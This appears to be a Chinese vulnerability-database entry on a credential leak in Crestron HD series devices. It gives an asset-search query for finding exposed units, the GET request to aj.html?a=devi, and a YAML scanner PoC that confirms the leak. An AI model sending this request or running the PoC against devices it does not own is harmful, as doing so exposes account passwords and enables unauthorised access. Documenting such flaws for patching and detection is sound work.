Crestron aj.html 账号密码泄漏CVE-2022-2317

1.漏洞描述

Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息

2.漏洞影响

Crestron HD等系列设备

3.测绘语句

app="Crestron-HD-RX-201-C-E"

4.漏洞复现

GET：http://xxx//aj.html?a=devi

Yaml

params: []
name: poc-yaml-Crestron aj.html 账号密码泄漏
set: {}
rules:
- method: GET
  path: /aj.html?a=devi
  headers: {}
  body: ""
  search: ""
  followredirects: false
  expression: response.status == 200 && response.body.bcontains(b'login_url')
groups: {}
detail:
  author: ""
  links: []
  description: ""
  version: ""